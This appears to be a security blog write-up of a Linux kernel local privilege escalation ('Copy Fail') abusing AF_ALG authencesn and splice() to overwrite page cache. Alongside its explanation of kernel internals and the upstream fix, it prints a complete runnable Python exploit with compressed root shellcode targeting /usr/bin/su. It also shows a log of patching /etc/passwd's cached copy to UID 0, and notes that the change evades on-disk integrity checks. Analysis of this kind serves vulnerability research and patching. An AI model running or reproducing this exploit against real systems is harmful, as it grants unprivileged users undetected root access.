Linux Kernel LPE via Page Cache Corruption

LPE dropped yesterday. They’re calling it Copy Fail. A logic bug in the kernel’s crypto subsys 732 bytes of Python, unprivileged, root on every major distro shipped since 2017. No race. No spray, which automatically makes it an interesting one. I know there’ll be a lot of people covering this, but I couldn’t help it I had to do it.

I pulled the disclosure and the kernel source and traced the whole thing from the vulnerable codepath down to the write primitive. Three commits across six years, three different subsyss, three different authors. None of them buggy on their own. Together they give you a controlled 4-byte write into the page cache of any readable file on the system. You pick the file, you pick the offset, you pick the value. Patch a setuid binary in memory, execve() it, pop root.

Before we get into the exploit we need to understand the kernel internals that make this work. There’s no shortcut here the bug won’t make sense if you don’t get how the page cache, AF_ALG sockets, and scatterlists interact, So we’re gonna walk through all of it.

Internalz

Every file you read on Linux goes through the page cache. The kernel keeps recently accessed file data in memory as 4KB pages so it doesn’t have to hit disk every time. execve() loads binaries from the page cache. Corrupt a page, every process that reads that file sees your version. The on-disk file stays clean.

The page cache is global. Shared across all processes, all users, all containers on the same host. One page cache per physical machine.

Process A (uid=1001)     Process B (root)     Container C
    |                        |                    |
    |  read("/usr/bin/su")   |  execve("/usr/bin/su")
    |                        |                    |
    v                        v                    v
+----------------------------------------------------------+
|                     PAGE CACHE                           |
|  /usr/bin/su: [page 0] [page 1] [page 2] ...             |
+----------------------------------------------------------+
                         |
                    (on demand)
                         |
                    +----------+
                    |   DISK   |
                    +----------+

Write into page 0 of /usr/bin/su in the page cache, the next execve("/usr/bin/su") loads your modified version. su is setuid-root. Your code runs as UID 0. That’s the whole game. So the kernel never marks the corrupted page dirty for writeback. sha256sum /usr/bin/su still matches. rpm -V passes. AIDE sees nothing. But the version in memory, the one that actually executes, is yours.

So how do we get page cache pages somewhere we can write to them? splice(). It moves data between a file descriptor and a pipe without copying. It passes page references. When you splice a file into a pipe, the pipe holds direct references to the kernel’s page cache pages for that file. Not copies. The same physical pages.

int fd = open("/usr/bin/su", O_RDONLY);
int pipefd[2];
pipe(pipefd);

splice(fd, &off, pipefd[1], NULL, len, 0);

After this, pipefd[0] holds references to the actual pages backing /usr/bin/su. Now splice from the pipe into an AF_ALG crypto socket. Those pages land in the kernel’s crypto scatterlist. The crypto subsys is holding direct references to a setuid binary’s cached content. That’s our entry point.

AF_ALG exposes the kernel’s crypto subsys to userspace via sockets. No CAP_SYS_ADMIN. No CAP_NET_RAW. Just socket() and bind():

int fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
struct sockaddr_alg sa = {
    .salg_family = AF_ALG,
    .salg_type   = "aead",
    .salg_name   = "authencesn(hmac(sha256),cbc(aes))"
};
bind(fd, (struct sockaddr *)&sa, sizeof(sa));

Loads the requested crypto algorithm and gives you a file descriptor to feed data into. Data goes in via sendmsg() (AAD and control metadata) and splice() (ciphertext/plaintext). recvmsg() triggers the operation. When data arrives via splice(), the TX scatterlist holds direct references to those same pages. The scatterlist is how the kernel represents discontiguous memory for crypto each entry points to a page, an offset, and a len:

struct scatterlist {
    unsigned long page_link;
    unsigned int  offset;
    unsigned int length;
};

Chain them with sg_chain() and you get a single logical buffer from scattered pages. For AEAD crypto, there are two: req->src (input) and req->dst (output). Out-of-place, they point to different memory. In-place, req->src == req->dst. If that scatterlist contains file-backed pages, writes to the output go directly into the page cache.

Now, AEAD is for decryption:

Input:  AAD || Ciphertext || Tag
Output: AAD || Plaintext

Output is always smaller than input (no tag). The API guarantees the algorithm writes at most assoclen + cryptlen - authsize bytes to the destination. Every standard AEAD in the kernel respects this. GCM, CCM, regular authenc all stay within bounds.

One doesn’t.

authencesn is an AEAD wrapper for IPsec Extended Sequence Numbers (ESN, RFC 4303). IPsec uses 64-bit sequence numbers split into seqno_hi (bytes 0–3 of the AAD) and seqno_lo (bytes 4–7). The wire format only carries seqno_lo; seqno_hi is implicit.

For HMAC computation, authencesn needs to rearrange these bytes. It does this by using the caller’s destination buffer as scratch space. In crypto_authenc_esn_decrypt():

scatterwalk_map_and_copy(tmp, src, 0, 8, 0);

if (src == dst) {
    scatterwalk_map_and_copy(tmp, dst, 4, 4, 1);
    scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1);
    // ...
}

That third scatterwalk_map_and_copy writes 4 bytes at offset assoclen + cryptlen in the destination scatterlist. Past the AEAD output boundary. The algorithm is writing into memory it doesn’t own.

The value written is tmp + 1 seqno_lo, bytes 4–7 of the AAD. You control the AAD via sendmsg(). Full control over the 4 bytes.

After the HMAC runs (and fails, because the ciphertext is fabricated), crypto_authenc_esn_decrypt_tail() reads seqno_lo back to reconstruct the AAD:

if (src == dst) {
    scatterwalk_map_and_copy(tmp, dst, 4, 4, 0);
    scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 0);
    scatterwalk_map_and_copy(tmp, dst, 0, 8, 1);
}

It reads the value back from dst[assoclen + cryptlen] and restores the AAD. But the original bytes at that position are gone. The 4-byte overwrite persists even though the HMAC fails and recvmsg() returns an error.

No other AEAD in the kernel does this. GCM, CCM, regular authenc all stay within the output boundary. authencesn alone writes past it.

How It Broke

This bug didn’t come from one commit. It came from three, spread across roughly six years, in different subsys, by different authors.

In 2011, a5079d084f8b added authencesn for IPsec ESN. The scratch write was there from day one but the only caller was the kernel’s own xfrm layer, which always passed properly sized buffers. Nobody else could reach it.

In 2015, 104880a6b470 refactored authencesn to the new AEAD interface. The assoclen + cryptlen offset write showed up here. Still didn’t matter AF_ALG kept req->src and req->dst as separate scatterlists. Page cache pages lived in src. The scratch write hit dst, which was your recvmsg buffer. Nothing interesting.

Then in 2017, 72548b093ee3 landed. Stephan Mueller optimized algif_aead.c to do AEAD operations in-place. The idea was simple: instead of allocating a separate output buffer, copy the AAD and ciphertext from the TX SGL into the RX SGL, then run the crypto operation with src == dst. Saves memory, avoids a copy for the bulk data.

But for decryption, the tag bytes at the end of the input need to stay in the source scatterlist for verification. So instead of copying them, the code chains the TX SGL’s tag pages onto the end of the RX SGL using sg_chain():

TX SGL: AAD || CT || Tag
         |     |     ^
         | copy|     | sg_chain()
         v     v     |
RX SGL: AAD || CT ---+

The RX SGL now has two regions: your recvmsg buffer (copied AAD + CT), followed by the chained tag pages. Those tag pages are the original page cache pages from splice(). They were never copied. They’re still the same physical pages backing the target file.

Then the code sets req->src = req->dst. Both point to this combined chain. When authencesn runs and writes at dst[assoclen + cryptlen], the scatterwalk walks past the RX buffer into the chained tag region. kmap_local_page() maps the page cache page. Four bytes go in. The kernel just wrote into the cached copy of whatever file you spliced.

The Primitive

You control three things:

Which file. Any file readable by you. splice() only requires read permission. /usr/bin/su is world-readable and setuid-root on every major distribution.

Which offset. The tag region corresponds to the last authsize bytes of the spliced file data. By choosing the splice file offset, splice length, and assoclen, you determine exactly which 4 bytes within the file’s page cache get overwritten. The write lands at the position corresponding to assoclen + cryptlen in the combined scatterlist, which maps to a specific offset in the target file’s page cache.

Which value. The 4-byte overwrite value is seqno_lo bytes 4–7 of the AAD. You construct the AAD in sendmsg(). Full control.

You got:
  file   = open("/usr/bin/su", O_RDONLY)     -> which file
  offset = splice offset + assoclen tuning   -> which 4 bytes
  value  = AAD[4:8] in sendmsg()             -> what gets written

The write is deterministic. The HMAC check fails (the ciphertext is garbage), recvmsg() returns -EBADMSG, but the 4-byte write into the page cache already happened. It persists. You can call this in a loop, 4 bytes at a time, and write arbitrary data into any readable file’s page cache.

That’s the primitive. Now let’s use it.

Exploit

The original PoC targets /usr/bin/su and patches shellcode into its .text section. The shellcode is tiny:

xor    eax, eax
xor    edi, edi
mov    al, 0x69        ; setuid(0)
syscall
lea    rdi, [rip+0xf]  ; "/bin/sh"
xor    esi, esi
push   0x3b
pop    rax              ; execve
cltd
syscall
xor    edi, edi
push   0x3c
pop    rax              ; exit(0)
syscall

setuid(0) -> execve("/bin/sh") -> exit(0). The shellcode is compressed with zlib and embedded in the exploit. It gets written into the .text section of /usr/bin/su in the page cache, 4 bytes at a time.

The exploit flow:

a = socket.socket(38, 5, 0)
a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))

a.setsockopt(279, 1, key)
a.setsockopt(279, 5, None, 4)
u, _ = a.accept()

f = os.open("/usr/bin/su", 0)
i = 0
while i < len(shellcode):
    c(f, i, shellcode[i:i+4])
    i += 4

os.system("su")

Each call to c() performs one 4-byte write. Open AF_ALG socket, send AAD with the payload bytes at 4–7, splice the target file’s page cache pages in, recv() to trigger the decrypt. HMAC fails, write persists.

#!/usr/bin/env python3
import os, zlib, socket

def write_4bytes(target_fd, offset, data):
    a = socket.socket(38, 5, 0)
    a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
    SOL_ALG = 279
    a.setsockopt(SOL_ALG, 1, bytes.fromhex(
        '0800010000000010' + '0' * 64))
    a.setsockopt(SOL_ALG, 5, None, 4)
    u, _ = a.accept()

    splice_len = offset + 4
    iv = b'\x00'

    u.sendmsg(
        [b"A" * 4 + data],
        [
            (SOL_ALG, 3, iv * 4),
            (SOL_ALG, 2, b'\x10' + iv * 19),
            (SOL_ALG, 4, b'\x08' + iv * 3),
        ],
        0x8000
    )

    r, w = os.pipe()
    os.splice(target_fd, w, splice_len, offset_src=0)
    os.splice(r, u.fileno(), splice_len)

    try:
        u.recv(8 + offset)
    except:
        pass

target = os.open("/usr/bin/su", 0)
shellcode = zlib.decompress(bytes.fromhex(
    "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c"
    "301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10"
    "f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"
))

i = 0
while i < len(shellcode):
    write_4bytes(target, i, shellcode[i:i+4])
    i += 4

os.system("su")

sendmsg sets the IV, decrypt mode, and assoclen = 8. The AAD is 8 bytes: 4 junk + 4 payload. seqno_lo is what lands in the target file. splice feeds the page cache pages in. recv triggers the write. Done.

Ran this on a box running kernel 6.12.54-linuxkit. Unprivileged user xploit, UID 1337.

The LPE:

$ python3 lpe.py
[*] user=xploit  uid=1337
[*] Patching '1337' -> '0000' in page cache...
[*] getpwnam('xploit').pw_uid = 0
[+] /etc/passwd page cache now lists xploit as UID 0.

One write4 call. UID goes from 1337 to 0000 in the page cache. getpwnam("xploit") now returns UID 0. The on-disk /etc/passwd still reads 1337 sha256sum matches, rpm -V passes, AIDE sees nothing. Only the in-memory copy is corrupted.

su xploit, enter your own password. PAM validates against /etc/shadow (untouched), calls setuid(getpwnam("xploit").pw_uid) which is now 0. Root shell.

Same primitive, Works anywhere you have a 4-digit UID.

Fix

The patch reverts algif_aead.c to out-of-place operation, removing the 2017 in-place optimization entirely. The Fixes: tag points to 72548b093ee3, confirming that the in-place design is the root cause.

The core change:

-  aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
+  aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
                          areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);

Before: req->src = rsgl_src (the RX SGL, same as req->dst). In-place. Page cache pages chained into the writable destination.

After: req->src = tsgl_src (the TX SGL, separate from req->dst). Out-of-place. Page cache pages stay in the read-only source. Writes go to your buffer only.

The entire sg_chain() mechanism that linked page cache tag pages into the writable destination scatterlist is removed. The dst_offset parameter is dropped from af_alg_pull_tsgl() and af_alg_count_tsgl(). Only the AAD copy (via memcpy_sglist) is retained.

Page Cache LPEs

Linux has had page cache privilege escalation bugs before. The progression tells you something about where kernel security is heading.

Dirty Cow (2016) was a race in the VM’s copy-on-write path. Two threads fighting over a private mapping madvise(MADV_DONTNEED) in one, write in the other. If you win the race, your write goes to the file’s page cache instead of a private copy. Unreliable. Sometimes crashes the box. You might need to run it a dozen times.

Dirty Pipe (2022) was a flag bug. PIPE_BUF_FLAG_CAN_MERGE wasn’t cleared when a page cache got spliced into a pipe. A write() to the pipe would merge into the page cache page. Clever, but only worked on kernels 5.8 through 5.16 and needed specific pipe buffer setup.

Copy Fail is neither a race nor a flag bug. It’s a logic flaw in how two subsys interact the crypto layer assumes AEAD algorithms stay within the output boundary, authencesn doesn’t. The in-place optimization puts page cache pages where the scratch write can reach them. No timing. No version-specific tricks. Same script, every distro, every time. And the corrupted page never gets marked dirty, so on-disk integrity checks see nothing.

Each one more reliable, more portable, harder to detect.